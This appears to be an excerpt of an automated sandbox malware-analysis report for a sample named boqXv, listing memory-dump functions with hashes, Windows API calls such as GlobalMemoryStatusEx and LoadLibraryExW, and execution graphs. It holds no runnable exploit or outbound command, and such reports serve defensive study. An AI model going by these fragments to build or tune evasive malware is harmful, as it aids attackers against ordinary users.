                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8bb83c0baadf59713aacb61c72ed365e445429820869eccc1434ef4402cf1ce
                                                • Instruction ID: 8ec11661f36199497a5095503aef65cdf3769aafc4f28519a3ed54b0b42a9749
                                                • Opcode Fuzzy Hash: f8bb83c0baadf59713aacb61c72ed365e445429820869eccc1434ef4402cf1ce
                                                • Instruction Fuzzy Hash: 3ED01730D0261D8FDB94DF24ED80A8CFBB6EF84200F10E6A5D009A3224DA705E898F04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 077A3649 Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f31422206646609f70475f65516afbe28a62d6cbf6752c85ef12a80ae1e291d
                                                • Instruction ID: c31679d4daa722272a9f9a84e0861ef678c8581a50818bc6d1e9eec334e206d4
                                                • Opcode Fuzzy Hash: 1f31422206646609f70475f65516afbe28a62d6cbf6752c85ef12a80ae1e291d
                                                • Instruction Fuzzy Hash: 5DC08CA6D3012A8FC34A5A20442A15269A6B784204F5A82A6C48683286DC2544088EA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 077ADE38 Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.1851702538.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_77a0000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T+-q$[V~*$[V~*$]\`
                                                • API String ID: 0-1849991408
                                                • Opcode ID: 54a14ad09bb851f0cf1120d8f3f68c73da11645e48c63ab3a76608a673863078
                                                • Instruction ID: 89d76e6ad6683dd7167f8ac8e7230381cacf1714fd4a24b1aee86d19c6c27b6f
                                                • Opcode Fuzzy Hash: 54a14ad09bb851f0cf1120d8f3f68c73da11645e48c63ab3a76608a673863078
                                                • Instruction Fuzzy Hash: 6441C3B0A18216DBE7349B65C9003BBB7B0EF92785F04CA66E575DBA89D334C840C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:136
                                                Total number of Limit Nodes:13
                                                execution_graph 40934 18ed01c 40935 18ed034 40934->40935 40936 18ed08e 40935->40936 40941 696d0b7 40935->40941 40945 696d0c8 40935->40945 40949 696e218 40935->40949 40958 696a0c4 40935->40958 40942 696d0c8 40941->40942 40943 696a0c4 CallWindowProcW 40942->40943 40944 696d10f 40943->40944 40944->40936 40946 696d0ee 40945->40946 40947 696a0c4 CallWindowProcW 40946->40947 40948 696d10f 40947->40948 40948->40936 40952 696e255 40949->40952 40950 696e289 40954 696e287 40950->40954 40983 696a18c 40950->40983 40952->40950 40953 696e279 40952->40953 40967 696e3b0 40953->40967 40972 696e47c 40953->40972 40978 696e3a0 40953->40978 40954->40954 40959 696a0cf 40958->40959 40960 696e289 40959->40960 40962 696e279 40959->40962 40961 696a18c CallWindowProcW 40960->40961 40963 696e287 40960->40963 40961->40963 40964 696e3b0 CallWindowProcW 40962->40964 40965 696e3a0 CallWindowProcW 40962->40965 40966 696e47c CallWindowProcW 40962->40966 40963->40963 40964->40963 40965->40963 40966->40963 40969 696e3c4 40967->40969 40968 696e450 40968->40954 40987 696e458 40969->40987 40991 696e468 40969->40991 40973 696e43a 40972->40973 40974 696e48a 40972->40974 40976 696e458 CallWindowProcW 40973->40976 40977 696e468 CallWindowProcW 40973->40977 40975 696e450 40975->40954 40976->40975 40977->40975 40980 696e3b0 40978->40980 40979 696e450 40979->40954 40981 696e458 CallWindowProcW 40980->40981 40982 696e468 CallWindowProcW 40980->40982 40981->40979 40982->40979 40984 696a197 40983->40984 40985 696f6ea CallWindowProcW 40984->40985 40986 696f699 40984->40986 40985->40986 40986->40954 40988 696e468 40987->40988 40989 696e479 40988->40989 40994 696f630 40988->40994 40989->40968 40992 696e479 40991->40992 40993 696f630 CallWindowProcW 40991->40993 40992->40968 40993->40992 40995 696a18c CallWindowProcW 40994->40995 40996 696f63a 40995->40996 40996->40989 40997 6962800 40998 6962846 GetCurrentProcess 40997->40998 41000 6962891 40998->41000 41001 6962898 GetCurrentThread 40998->41001 41000->41001 41002 69628d5 GetCurrentProcess 41001->41002 41003 69628ce 41001->41003 41004 696290b 41002->41004 41003->41002 41005 6962933 GetCurrentThreadId 41004->41005 41006 6962964 41005->41006 41007 6964fcf 41010 6965682 41007->41010 41011 69656a0 41010->41011 41013 69656c8 41011->41013 41014 6965268 41011->41014 41013->41013 41015 6965273 41014->41015 41019 696aa60 41015->41019 41028 696aa48 41015->41028 41016 6965771 41016->41013 41021 696aa91 41019->41021 41022 696ab91 41019->41022 41020 696aa9d 41020->41016 41021->41020 41037 696acd8 41021->41037 41040 696acc8 41021->41040 41022->41016 41023 696aadd 41044 696bfd8 41023->41044 41048 696bfc9 41023->41048 41030 696aa91 41028->41030 41032 696ab91 41028->41032 41029 696aa9d 41029->41016 41030->41029 41035 696acd8 2 API calls 41030->41035 41036 696acc8 2 API calls 41030->41036 41031 696aadd 41033 696bfd8 CreateWindowExW 41031->41033 41034 696bfc9 CreateWindowExW 41031->41034 41032->41016 41033->41032 41034->41032 41035->41031 41036->41031 41052 696ad18 41037->41052 41038 696ace2 41038->41023 41041 696acd8 41040->41041 41043 696ad18 2 API calls 41041->41043 41042 696ace2 41042->41023 41043->41042 41045 696c003 41044->41045 41046 696c0b2 41045->41046 41072 696ceb0 41045->41072 41049 696bfd8 41048->41049 41050 696c0b2 41049->41050 41051 696ceb0 CreateWindowExW 41049->41051 41051->41050 41053 696ad1d 41052->41053 41054 696ad5c 41053->41054 41060 696afb3 41053->41060 41064 696afc0 41053->41064 41054->41038 41055 696af60 GetModuleHandleW 41057 696af8d 41055->41057 41056 696ad54 41056->41054 41056->41055 41057->41038 41061 696afd4 41060->41061 41063 696aff9 41061->41063 41068 6969f28 41061->41068 41063->41056 41065 696afd4 41064->41065 41066 6969f28 LoadLibraryExW 41065->41066 41067 696aff9 41065->41067 41066->41067 41067->41056 41069 696b180 LoadLibraryExW 41068->41069 41071 696b1f9 41069->41071 41071->41063 41073 696cec6 41072->41073 41074 696cefe CreateWindowExW 41072->41074 41073->41046 41076 696d034 41074->41076 41076->41076 41077 6962a48 DuplicateHandle 41078 6962ade 41077->41078 40911 3270848 40912 3270849 40911->40912 40913 327091b 40912->40913 40915 3271390 40912->40915 40917 3271394 40915->40917 40916 32714b8 40916->40912 40917->40916 40919 3277408 40917->40919 40920 3277412 40919->40920 40923 327742c 40920->40923 40924 697d810 40920->40924 40929 697d820 40920->40929 40923->40917 40926 697d820 40924->40926 40925 697da4a 40925->40923 40926->40925 40927 697da61 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40926->40927 40928 697da70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40926->40928 40927->40926 40928->40926 40931 697d825 40929->40931 40930 697da4a 40930->40923 40931->40930 40932 697da61 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40931->40932 40933 697da70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40931->40933 40932->40931 40933->40931

                                                Executed Functions

                                                Function 03279EA8 Relevance: 3.1, Instructions: 3075COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7b0550bc6645b15e279e1cb5141da02046387130016b1b5d3d44c0b842d608c
                                                • Instruction ID: d781c3dadc936bf6645f4faeae8dccb2d9e0ef5b3261b2d1f9faf1ec6553f550
                                                • Opcode Fuzzy Hash: e7b0550bc6645b15e279e1cb5141da02046387130016b1b5d3d44c0b842d608c
                                                • Instruction Fuzzy Hash: 9D630B31D10B1A8ACB51EF68C88059DF7B1FF99300F15D79AE458B7221EB70AAD5CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0327D349 Relevance: 2.1, Instructions: 2119COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ebb98def703b4c8422aabc25d088fe91d20cd4c958897192fbda865d5a121519
                                                • Instruction ID: 6494be46390773756787d19a367c4b9490dfefe11787aaa83f4de34412ec31d9
                                                • Opcode Fuzzy Hash: ebb98def703b4c8422aabc25d088fe91d20cd4c958897192fbda865d5a121519
                                                • Instruction Fuzzy Hash: 8F231D31D10B1A8ECB11EF68C8945ADF7B5FF99300F15C79AE458A7221EB70AAC5CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032796F0 Relevance: .6, Instructions: 621COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b8e0ea06caab28afc3eccf9bf130e1d0951ec242baa6c1014fdc2c36ef4bb8e
                                                • Instruction ID: a5ec94d8ae5faab56cb0188d22be61eac89f4c1023af00fca65224251c00d8e5
                                                • Opcode Fuzzy Hash: 5b8e0ea06caab28afc3eccf9bf130e1d0951ec242baa6c1014fdc2c36ef4bb8e
                                                • Instruction Fuzzy Hash: 4A329175A102068FDB14DF68D984BADBBB6FF88310F248569E809DB354DB35DC81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03274AD0 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 043b9d800ab94b19688a8ecea28f5bf88f60190aaddfeb01cdd3f4ce33a565ed
                                                • Instruction ID: a70a4f961e4e9ded56f96e8cc49e6f904ff50a3ce59b688e4786a1beb42e551b
                                                • Opcode Fuzzy Hash: 043b9d800ab94b19688a8ecea28f5bf88f60190aaddfeb01cdd3f4ce33a565ed
                                                • Instruction Fuzzy Hash: 16B17E70E1020ACFDB14DFAAD88579DBBF2BF88314F188129D414EB294EB749885CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03273EB8 Relevance: .2, Instructions: 238COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d61d652957f3ada05862941da45ac977439eb7e3c3dc2beb947ed4422060052b
                                                • Instruction ID: 12ec9fc09a711e3850dc28ceb06634b03d4accfd95f9173cdc741e8255c04ff7
                                                • Opcode Fuzzy Hash: d61d652957f3ada05862941da45ac977439eb7e3c3dc2beb947ed4422060052b
                                                • Instruction Fuzzy Hash: EB915F71E1020ADFDF14DFAAC9817DDBBF2BF88714F188129E419AB254DB749885CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 069627FA Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1388 69627fa-696288f GetCurrentProcess 1392 6962891-6962897 1388->1392 1393 6962898-69628cc GetCurrentThread 1388->1393 1392->1393 1394 69628d5-6962909 GetCurrentProcess 1393->1394 1395 69628ce-69628d4 1393->1395 1397 6962912-696292d call 69629d0 1394->1397 1398 696290b-6962911 1394->1398 1395->1394 1401 6962933-6962962 GetCurrentThreadId 1397->1401 1398->1397 1402 6962964-696296a 1401->1402 1403 696296b-69629cd 1401->1403 1402->1403
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0696287E
                                                • GetCurrentThread.KERNEL32 ref: 069628BB
                                                • GetCurrentProcess.KERNEL32 ref: 069628F8
                                                • GetCurrentThreadId.KERNEL32 ref: 06962951
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 0cc5f581418d6c391f437fb67e363f22615bb80cbd30d62dc66640ccc34fd976
                                                • Instruction ID: 5a9431f6f199250453f801227c0f6ad714acb581845ef75b70c60e0acc88de43
                                                • Opcode Fuzzy Hash: 0cc5f581418d6c391f437fb67e363f22615bb80cbd30d62dc66640ccc34fd976
                                                • Instruction Fuzzy Hash: AB5143B0900349CFDB54DFAAD948BDEBBF1AF88304F248469E419A7660D7349984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06962800 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1410 6962800-696288f GetCurrentProcess 1414 6962891-6962897 1410->1414 1415 6962898-69628cc GetCurrentThread 1410->1415 1414->1415 1416 69628d5-6962909 GetCurrentProcess 1415->1416 1417 69628ce-69628d4 1415->1417 1419 6962912-696292d call 69629d0 1416->1419 1420 696290b-6962911 1416->1420 1417->1416 1423 6962933-6962962 GetCurrentThreadId 1419->1423 1420->1419 1424 6962964-696296a 1423->1424 1425 696296b-69629cd 1423->1425 1424->1425
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0696287E
                                                • GetCurrentThread.KERNEL32 ref: 069628BB
                                                • GetCurrentProcess.KERNEL32 ref: 069628F8
                                                • GetCurrentThreadId.KERNEL32 ref: 06962951
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 204ca25e65a367385d4b2a43f1ec701e081e121e798af5d1610374036bbb946e
                                                • Instruction ID: 8f2759806794fa8eb7883a8fc7c506a80eddf6bac3aeb88768fd3303d67b5b85
                                                • Opcode Fuzzy Hash: 204ca25e65a367385d4b2a43f1ec701e081e121e798af5d1610374036bbb946e
                                                • Instruction Fuzzy Hash: 545144B0900349CFDB54DFAAD948BDEBBF1EB88314F208469E419A7660D7349984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0696AD18 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0696AF7E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b1cf2c655696bd8bfc8dfd776ecc387b36d1fa0aa03474d367de25ecf13eefad
                                                • Instruction ID: f57460d5725d5f8a20aedda30db60efeac0cf835403d32c4d848cb6dd9a35ced
                                                • Opcode Fuzzy Hash: b1cf2c655696bd8bfc8dfd776ecc387b36d1fa0aa03474d367de25ecf13eefad
                                                • Instruction Fuzzy Hash: 8A8167B0A00B058FD7A5DF2AD45476ABBF5FF88300F10892EE48AD7A50DB74E945CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0696CEB0 Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0696D022
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 2e785d47d45475322b47290d0256833315cfe559c38f26dc7cba8f0bf9fabfe9
                                                • Instruction ID: 4a03c750f2d79bcc10fb7109c68c23f150c1eed4937dbe358039882444789f30
                                                • Opcode Fuzzy Hash: 2e785d47d45475322b47290d0256833315cfe559c38f26dc7cba8f0bf9fabfe9
                                                • Instruction Fuzzy Hash: C551D0B1D00349AFDF15CF99C980ADEBFB6BF48314F24816AE518AB220D7719945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0697E638 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1921110624.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6970000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2814a43641931ab270ea4952ae1253bb392083d1cc21049fef3957a6dc7ee7f3
                                                • Instruction ID: f3eddb4f2413be393d24703c1b0bc56f6aeab93c8e90bc665524922ea11db3b6
                                                • Opcode Fuzzy Hash: 2814a43641931ab270ea4952ae1253bb392083d1cc21049fef3957a6dc7ee7f3
                                                • Instruction Fuzzy Hash: E1413272D003598FCB04DFB9D8002EEBBF5AF89310F2585AAE508E7651DB389985CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0696CF10 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0696D022
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 64bc2695f4e65ac5f6c294add088e6b701dcd1c7764aa4c35fc532bf7868a0bf
                                                • Instruction ID: a5558a843bff3589774e8f245c1f8ff52a5e6ac5d6125a2217359976f68f2503
                                                • Opcode Fuzzy Hash: 64bc2695f4e65ac5f6c294add088e6b701dcd1c7764aa4c35fc532bf7868a0bf
                                                • Instruction Fuzzy Hash: F241BFB1D00349DFDB14CFAAC984ADEBBB5BF48310F24852AE819AB210D7719985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0696A18C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0696F711
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 30d804cb3c8a3e3fbcc45d1b2e498a4afca838fdeacd57c64a1760ec36a1289c
                                                • Instruction ID: c2faf9efc02bb770a636be780940f33cee2359ebb64eb7107f9ec56f5daa671b
                                                • Opcode Fuzzy Hash: 30d804cb3c8a3e3fbcc45d1b2e498a4afca838fdeacd57c64a1760ec36a1289c
                                                • Instruction Fuzzy Hash: D1412CB5900309DFCB54CF5AC448AAABBF5FB88314F24C459E519AB721D775A841CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06962A40 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06962ACF
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 5042042484c7c9f7d1c70981b61c45572cc7e3e44b91ed1d897b39885f069e5a
                                                • Instruction ID: 75d8048aa4bef054189150ad6c11fae73d96fc02c5e8cb53a9470460fb730308
                                                • Opcode Fuzzy Hash: 5042042484c7c9f7d1c70981b61c45572cc7e3e44b91ed1d897b39885f069e5a
                                                • Instruction Fuzzy Hash: 3121D4B59002189FDB10CFAAD984ADEBBF8FB48320F14842AE955A7250D375A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06962A48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06962ACF
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 42b1d2442f267df54080083eb7f38c40172012482e0b36151a164e2c3beee9f9
                                                • Instruction ID: 885c0548bc1abffeedacc8a82092631ab4d88ab3345318ee6c4195fc0ddf63ac
                                                • Opcode Fuzzy Hash: 42b1d2442f267df54080083eb7f38c40172012482e0b36151a164e2c3beee9f9
                                                • Instruction Fuzzy Hash: 3621C4B59003589FDB10CF9AD984ADEBBF8FB48320F14841AE958A7350D375A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0697D2DC Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0697E68A), ref: 0697E777
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1921110624.0000000006970000.00000040.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6970000_boqXv.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: bc8b0eaf355654a8ce27804ff965f43c257d5417fe99970510ba8a7ccf3f1323
                                                • Instruction ID: 8b1f949fb5e5a7b97f023b74ad48a2098fe3b5a4910a0cfe5c9df79de41ad0ac
                                                • Opcode Fuzzy Hash: bc8b0eaf355654a8ce27804ff965f43c257d5417fe99970510ba8a7ccf3f1323
                                                • Instruction Fuzzy Hash: 1F1103B1C006599BCB10DF9AC444B9EFBF4AB48320F10856AD918B7251D378A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06969F28 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0696AFF9,00000800,00000000,00000000), ref: 0696B1EA
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: bb3f6160c4dab2e68df35ce071889aa76ee6f5d34895e58b320db5cd90368d97
                                                • Instruction ID: 476fa4516da01c5f383728e2aa555bc808073ef7dcce5448f18bc0c0070e5982
                                                • Opcode Fuzzy Hash: bb3f6160c4dab2e68df35ce071889aa76ee6f5d34895e58b320db5cd90368d97
                                                • Instruction Fuzzy Hash: 5C11F6B6D003099FDB10CF9AD884ADEFBF8FB48310F10842AE559AB610D375A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0696B17A Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0696AFF9,00000800,00000000,00000000), ref: 0696B1EA
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: a37424562dcb15bb4a5d263210ba8205632ca2f476c306d17a83192bb8569976
                                                • Instruction ID: 50f9a0610d49a15075fef5c46fc24fe9a2cd59a755193828bc1e9a8e43420c06
                                                • Opcode Fuzzy Hash: a37424562dcb15bb4a5d263210ba8205632ca2f476c306d17a83192bb8569976
                                                • Instruction Fuzzy Hash: 6511F6B6D003099FDB10CF9AD844ADEFBF9EB48310F20842AE559A7610C375A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0696AF18 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0696AF7E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1920926978.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6960000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: fd040312b4c9aafb778850bc26247a7901f05abe15a09c12c75e70d072625d66
                                                • Instruction ID: 7319705591e5b4fffb0402dff415fb54c913c9eb3418be1efca4596c9c066d89
                                                • Opcode Fuzzy Hash: fd040312b4c9aafb778850bc26247a7901f05abe15a09c12c75e70d072625d66
                                                • Instruction Fuzzy Hash: 8D11D2B5C003498FCB10CF9AC544ADEFBF4AB48324F20842AD469B7610C379A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0327F66D Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH^q
                                                • API String ID: 0-2549759414
                                                • Opcode ID: e683e187d02ae666c99bdf5a16a89466e9188c0bef629a617ffdf87f5b9d9b93
                                                • Instruction ID: 3fb34b12322afa717a8614a8d6cc328a4fe48272fc2142ff2a8a04327f797c6e
                                                • Opcode Fuzzy Hash: e683e187d02ae666c99bdf5a16a89466e9188c0bef629a617ffdf87f5b9d9b93
                                                • Instruction Fuzzy Hash: C1311431B182029FDB15DF34C614AAE7BE3BB89300F184468D406DB395EE75DD86CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0327F680 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH^q
                                                • API String ID: 0-2549759414
